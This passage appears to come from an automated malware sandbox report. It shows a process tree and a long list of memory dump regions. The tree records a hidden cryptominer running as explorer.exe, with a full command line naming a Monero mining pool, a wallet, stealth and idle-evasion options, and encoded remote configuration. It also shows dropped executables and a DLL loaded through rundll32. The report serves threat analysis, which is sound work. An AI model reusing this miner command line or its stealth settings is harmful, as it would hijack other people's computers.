                                                        PID:2656
                                                    • C:\Windows\explorer.exe
                                                      C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.raw/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6CFvMg9MgC241sftmft2lYvgrdUwd08ilNkQ/lCe6+NW" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
                                                      7⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:3572
                                          • C:\Users\Admin\AppData\Local\Temp\Jonba.exe
                                            "C:\Users\Admin\AppData\Local\Temp\Jonba.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2676
                                        • C:\Windows\system32\rundll32.exe
                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                          1⤵
                                          • Process spawned unexpected child process
                                          PID:2344
                                          • C:\Windows\SysWOW64\rundll32.exe
                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                            2⤵
                                            • Loads dropped DLL
                                            • Modifies registry class
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2308
                                        • C:\42f73480af6ac18b83063d\Setup.exe
                                          C:\42f73480af6ac18b83063d\\Setup.exe /q /norestart /x86 /x64 /web
                                          1⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Checks processor information in registry
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:3152
                                        • C:\Windows\system32\wbem\wmiprvse.exe
                                          C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                          1⤵
                                            PID:2740

                                          Network

                                          MITRE ATT&CK Enterprise v6

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          • memory/436-212-0x0000000004C40000-0x0000000004D16000-memory.dmp

                                            Filesize

                                            856KB

                                            Download

                                          • memory/436-211-0x0000000004AC0000-0x0000000004B3C000-memory.dmp

                                            Filesize

                                            496KB

                                            Download

                                          • memory/436-217-0x0000000000400000-0x0000000002F74000-memory.dmp

                                            Filesize

                                            43.5MB

                                            Download

                                          • memory/648-311-0x000002013DE50000-0x000002013DE52000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/648-320-0x000002013DE73000-0x000002013DE75000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/648-309-0x000002013DE50000-0x000002013DE52000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/648-314-0x00000201569A0000-0x0000020156BBC000-memory.dmp

                                            Filesize

                                            2.1MB

                                            Download

                                          • memory/648-318-0x000002013DE50000-0x000002013DE52000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/648-319-0x000002013DE70000-0x000002013DE72000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/648-317-0x000002013DEE0000-0x000002013DEE1000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/648-307-0x000002013C000000-0x000002013C220000-memory.dmp

                                            Filesize

                                            2.1MB

                                            Download

                                          • memory/648-321-0x000002013DE76000-0x000002013DE77000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/648-310-0x000002013DE50000-0x000002013DE52000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/648-316-0x000002013DE50000-0x000002013DE52000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/648-313-0x000002013DE50000-0x000002013DE52000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/800-146-0x0000000001240000-0x0000000001252000-memory.dmp

                                            Filesize

                                            72KB

                                            Download

                                          • memory/800-143-0x0000000000E30000-0x0000000000E40000-memory.dmp

                                            Filesize

                                            64KB

                                            Download

                                          • memory/912-147-0x0000000002610000-0x0000000002611000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/912-145-0x0000000002610000-0x0000000002611000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/916-255-0x000001FDB6260000-0x000001FDB6262000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/916-254-0x000001FDB6260000-0x000001FDB6262000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/916-257-0x000001FDB6B40000-0x000001FDB6BB2000-memory.dmp

                                            Filesize

                                            456KB

                                            Download

                                          • memory/1004-237-0x000001FEB3B00000-0x000001FEB3B02000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1004-240-0x000001FEB3B60000-0x000001FEB3BD2000-memory.dmp

                                            Filesize

                                            456KB

                                            Download

                                          • memory/1004-233-0x000001FEB3B00000-0x000001FEB3B02000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1020-200-0x00000000004C0000-0x00000000004E6000-memory.dmp

                                            Filesize

                                            152KB

                                            Download

                                          • memory/1020-201-0x00000000020A0000-0x00000000020E3000-memory.dmp

                                            Filesize

                                            268KB

                                            Download

                                          • memory/1020-202-0x0000000000400000-0x0000000000466000-memory.dmp

                                            Filesize

                                            408KB

                                            Download

                                          • memory/1080-253-0x0000024A501F0000-0x0000024A501F2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1080-252-0x0000024A501F0000-0x0000024A501F2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1080-262-0x0000024A51070000-0x0000024A510E2000-memory.dmp

                                            Filesize

                                            456KB

                                            Download

                                          • memory/1100-154-0x0000000000C30000-0x0000000000C31000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/1100-165-0x000000001B830000-0x000000001B832000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1240-277-0x00000267581F0000-0x00000267581F2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1240-275-0x00000267581F0000-0x00000267581F2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1240-279-0x0000026758230000-0x00000267582A2000-memory.dmp

                                            Filesize

                                            456KB

                                            Download

                                          • memory/1288-273-0x000001D9D09E0000-0x000001D9D09E2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1288-274-0x000001D9D09E0000-0x000001D9D09E2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1288-280-0x000001D9D1240000-0x000001D9D12B2000-memory.dmp

                                            Filesize

                                            456KB

                                            Download

                                          • memory/1496-267-0x00000181D8660000-0x00000181D86D2000-memory.dmp

                                            Filesize

                                            456KB

                                            Download

                                          • memory/1496-261-0x00000181D7DB0000-0x00000181D7DB2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1496-260-0x00000181D7DB0000-0x00000181D7DB2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1856-278-0x00000122D6340000-0x00000122D63B2000-memory.dmp

                                            Filesize

                                            456KB

                                            Download

                                          • memory/1856-271-0x00000122D57B0000-0x00000122D57B2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/1856-270-0x00000122D57B0000-0x00000122D57B2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/2088-180-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/2308-219-0x00000000043F0000-0x000000000444D000-memory.dmp

                                            Filesize

                                            372KB

                                            Download

                                          • memory/2308-218-0x0000000004267000-0x0000000004368000-memory.dmp

                                            Filesize

                                            1.0MB

                                            Download

                                          • memory/2356-251-0x000001E8A7910000-0x000001E8A7912000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/2356-250-0x000001E8A7910000-0x000001E8A7912000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/2356-256-0x000001E8A7890000-0x000001E8A7902000-memory.dmp

                                            Filesize

                                            456KB

                                            Download

                                          • memory/2368-246-0x0000024F08680000-0x0000024F08682000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/2368-243-0x0000024F08680000-0x0000024F08682000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/2368-248-0x0000024F08960000-0x0000024F089D2000-memory.dmp

                                            Filesize

                                            456KB

                                            Download

                                          • memory/2564-390-0x000002911CEA3000-0x000002911CEA5000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/2564-391-0x000002911CEA6000-0x000002911CEA7000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/2564-388-0x000002911CEA0000-0x000002911CEA2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/2576-228-0x000001A7B35C0000-0x000001A7B35C2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/2576-229-0x000001A7B35C0000-0x000001A7B35C2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/2576-247-0x000001A7B3E80000-0x000001A7B3EF2000-memory.dmp

                                            Filesize

                                            456KB

                                            Download

                                          • memory/2656-420-0x00000203E4220000-0x00000203E4222000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/2656-421-0x00000203E4223000-0x00000203E4225000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/2656-422-0x00000203E4226000-0x00000203E4227000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/2656-411-0x00000203E3EF0000-0x00000203E3EF6000-memory.dmp

                                            Filesize

                                            24KB

                                            Download

                                          • memory/2676-190-0x00000000049E0000-0x00000000049E1000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/2676-174-0x0000000000130000-0x0000000000131000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/2684-282-0x0000028A4BFF0000-0x0000028A4BFF2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/2684-286-0x0000028A4CF40000-0x0000028A4CFB2000-memory.dmp

                                            Filesize

                                            456KB

                                            Download

                                          • memory/2684-281-0x0000028A4BFF0000-0x0000028A4BFF2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/2696-287-0x000002185CB60000-0x000002185CBD2000-memory.dmp

                                            Filesize

                                            456KB

                                            Download

                                          • memory/2696-283-0x000002185C3F0000-0x000002185C3F2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/2696-284-0x000002185C3F0000-0x000002185C3F2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/2764-160-0x0000000000400000-0x0000000000414000-memory.dmp

                                            Filesize

                                            80KB

                                            Download

                                          • memory/3008-327-0x000001FE96590000-0x000001FE96592000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/3180-135-0x0000000000200000-0x0000000000201000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/3180-148-0x000000001B060000-0x000000001B062000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/3396-312-0x0000000004D10000-0x000000002F6D3000-memory.dmp

                                            Filesize

                                            681.8MB

                                            Download

                                          • memory/3396-306-0x0000000002B00000-0x0000000002B01000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/3396-325-0x000000002FAB0000-0x000000002FB5D000-memory.dmp

                                            Filesize

                                            692KB

                                            Download

                                          • memory/3396-308-0x0000000002B00000-0x0000000002B01000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/3396-324-0x000000002F910000-0x000000002F9F1000-memory.dmp

                                            Filesize

                                            900KB

                                            Download

                                          • memory/3412-181-0x0000000000400000-0x0000000000414000-memory.dmp

                                            Filesize

                                            80KB

                                            Download

                                          • memory/3572-407-0x0000000000BE0000-0x0000000000C00000-memory.dmp

                                            Filesize

                                            128KB

                                            Download

                                          • memory/3572-398-0x0000000140000000-0x0000000140786000-memory.dmp

                                            Filesize

                                            7.5MB

                                            Download

                                          • memory/3652-259-0x0000000005300000-0x0000000005301000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/3652-276-0x0000000005303000-0x0000000005305000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/3652-285-0x00000000085F0000-0x00000000085F1000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/3652-288-0x0000000009F50000-0x0000000009F51000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/3652-241-0x0000000000A50000-0x0000000000A51000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/3832-301-0x00000226370F0000-0x00000226370F2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/3832-230-0x00000226370F0000-0x00000226370F2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/3832-249-0x0000022637370000-0x00000226373E2000-memory.dmp

                                            Filesize

                                            456KB

                                            Download

                                          • memory/3832-303-0x0000022639C00000-0x0000022639D05000-memory.dmp

                                            Filesize

                                            1.0MB

                                            Download

                                          • memory/3832-302-0x0000022638C20000-0x0000022638C3B000-memory.dmp

                                            Filesize

                                            108KB

                                            Download

                                          • memory/3832-300-0x00000226370F0000-0x00000226370F2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/3832-232-0x00000226370F0000-0x00000226370F2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/4104-191-0x00000000001F0000-0x00000000001F1000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/4188-118-0x0000000000BA0000-0x0000000000BA1000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/4444-149-0x0000000001050000-0x0000000001051000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/4444-164-0x00000000029C0000-0x00000000029C2000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/4444-129-0x0000000000940000-0x0000000000941000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/4564-223-0x0000028178770000-0x0000028178772000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/4564-244-0x0000028178B10000-0x0000028178B82000-memory.dmp

                                            Filesize

                                            456KB

                                            Download

                                          • memory/4564-238-0x0000028178A50000-0x0000028178A9D000-memory.dmp

                                            Filesize

                                            308KB

                                            Download

                                          • memory/4564-226-0x0000028178770000-0x0000028178772000-memory.dmp

                                            Filesize

                                            8KB

                                            Download

                                          • memory/4600-196-0x0000000000230000-0x0000000000231000-memory.dmp

                                            Filesize

                                            4KB

                                            Download

                                          • memory/4600-195-0x0000000000230000-0x0000000000231000-memory.dmp

                                            Filesize

                                            4KB

                                            Download